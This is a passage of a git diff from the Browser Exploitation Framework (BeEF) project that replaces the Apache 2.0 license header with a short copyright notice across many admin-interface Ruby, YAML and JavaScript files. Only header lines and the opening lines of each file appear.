-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # @note Prevent exec from ever being used
diff --git a/core/ruby/string.rb b/core/ruby/string.rb
index 9f825ebab..7a83138d1 100644
--- a/core/ruby/string.rb
+++ b/core/ruby/string.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class String
 
diff --git a/core/settings.rb b/core/settings.rb
index 0be0f6644..2230b7612 100644
--- a/core/settings.rb
+++ b/core/settings.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Settings
diff --git a/extensions/admin_ui/api/command.rb b/extensions/admin_ui/api/command.rb
index d1257fe64..c18dd991d 100644
--- a/extensions/admin_ui/api/command.rb
+++ b/extensions/admin_ui/api/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb
index ddc49d73c..e524f4caf 100644
--- a/extensions/admin_ui/api/handler.rb
+++ b/extensions/admin_ui/api/handler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/classes/httpcontroller.rb b/extensions/admin_ui/classes/httpcontroller.rb
index 7d6c37965..68948a782 100644
--- a/extensions/admin_ui/classes/httpcontroller.rb
+++ b/extensions/admin_ui/classes/httpcontroller.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/classes/session.rb b/extensions/admin_ui/classes/session.rb
index 85b16b813..0d6990dc1 100644
--- a/extensions/admin_ui/classes/session.rb
+++ b/extensions/admin_ui/classes/session.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/config.yaml b/extensions/admin_ui/config.yaml
index dde46ca70..9259abf81 100644
--- a/extensions/admin_ui/config.yaml
+++ b/extensions/admin_ui/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/admin_ui/constants/agents.rb b/extensions/admin_ui/constants/agents.rb
index 546f0b0f2..cd7d99f88 100644
--- a/extensions/admin_ui/constants/agents.rb
+++ b/extensions/admin_ui/constants/agents.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/constants/icons.rb b/extensions/admin_ui/constants/icons.rb
index 73afc7fb3..53bc83e79 100644
--- a/extensions/admin_ui/constants/icons.rb
+++ b/extensions/admin_ui/constants/icons.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/controllers/authentication/authentication.rb b/extensions/admin_ui/controllers/authentication/authentication.rb
index f07a4f94e..78a91e46a 100644
--- a/extensions/admin_ui/controllers/authentication/authentication.rb
+++ b/extensions/admin_ui/controllers/authentication/authentication.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/controllers/logs/logs.rb b/extensions/admin_ui/controllers/logs/logs.rb
index 3759ebdec..e384dd620 100644
--- a/extensions/admin_ui/controllers/logs/logs.rb
+++ b/extensions/admin_ui/controllers/logs/logs.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index b10ccc4bf..74643feea 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index a1a35998b..e2fe61f07 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/admin_ui/extension.rb b/extensions/admin_ui/extension.rb
index 041d30d30..1ce500b0e 100644
--- a/extensions/admin_ui/extension.rb
+++ b/extensions/admin_ui/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/admin_ui/handlers/ui.rb b/extensions/admin_ui/handlers/ui.rb
index 3bfc0da3a..8a375aa52 100644
--- a/extensions/admin_ui/handlers/ui.rb
+++ b/extensions/admin_ui/handlers/ui.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Generic Http Handler that extensions can use to register http
diff --git a/extensions/admin_ui/media/javascript/ext-beef.js b/extensions/admin_ui/media/javascript/ext-beef.js
index 079900739..2f5715ff5 100644
--- a/extensions/admin_ui/media/javascript/ext-beef.js
+++ b/extensions/admin_ui/media/javascript/ext-beef.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 Ext.beef = function(){
     var msgCt;
 
diff --git a/extensions/admin_ui/media/javascript/ui/authentication.js b/extensions/admin_ui/media/javascript/ui/authentication.js
index 2744a7ca1..7e5646342 100644
--- a/extensions/admin_ui/media/javascript/ui/authentication.js
+++ b/extensions/admin_ui/media/javascript/ui/authentication.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 Ext.onReady(function() {
 
 	submitAuthForm = function() {
diff --git a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
index acc25334b..c0af84dce 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 DataGrid = function(url, page, base) {
     this.page = page;
     this.url = url;
diff --git a/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js b/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js
index c4734c2f9..901bbc29b 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * RULES TYPE
  * - DOMAIN : DOMAIN www.zzz.com
diff --git a/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js b/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js
index 8e620e980..c8ef18a0a 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 HackVertorTab = function() {
 
 	/*
diff --git a/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js b/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js
index 47dbce237..093d137df 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 HooksTab = function() {
 
 	/*
diff --git a/extensions/admin_ui/media/javascript/ui/panel/Logout.js b/extensions/admin_ui/media/javascript/ui/panel/Logout.js
index d2dc4de6d..13c9c5afe 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/Logout.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/Logout.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 DoLogout = function() {
 	
 	var button = Ext.get('do-logout-menu');
diff --git a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
index c00c3ef5d..45fe5811e 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 MainPanel = function(){
     this.preview = new Ext.Panel({
         id: 'preview',
diff --git a/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js b/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js
index 2074c681a..c975ea08c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * The Beef_StatusBar class provides the functionality of the status bar 
  * at the bottom of each tab in the UI
diff --git a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
index 49696f87f..294746856 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 PanelViewer = {};
 var mainPanel, zombiesTreeLists, zombieTabs, zombiesManager;
 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
index c804b8a60..0c1abb65c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 WelcomeTab = function() {
 
     welcome = " \
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
index 3e8466e55..54f7e3056 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 ZombieTab = function(zombie) {
 	
 	main_tab = new ZombieTab_DetailsTab(zombie);
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js
index 242ddcb2d..901aaf8b4 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 ZombieTabs = function(zombie_tree_list) {
 	
 	//a variable to store the list of trees.
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 347f7b97d..1aeb3e6e2 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
